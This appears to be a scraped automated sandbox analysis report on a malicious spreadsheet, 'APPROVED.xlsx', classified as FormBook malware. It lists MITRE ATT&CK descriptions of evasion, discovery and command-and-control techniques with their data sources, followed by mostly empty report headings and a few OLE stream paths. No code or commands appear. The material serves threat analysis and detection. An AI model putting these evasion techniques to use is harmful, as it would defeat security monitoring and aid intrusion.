Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report APPROVED.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "APPROVED.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208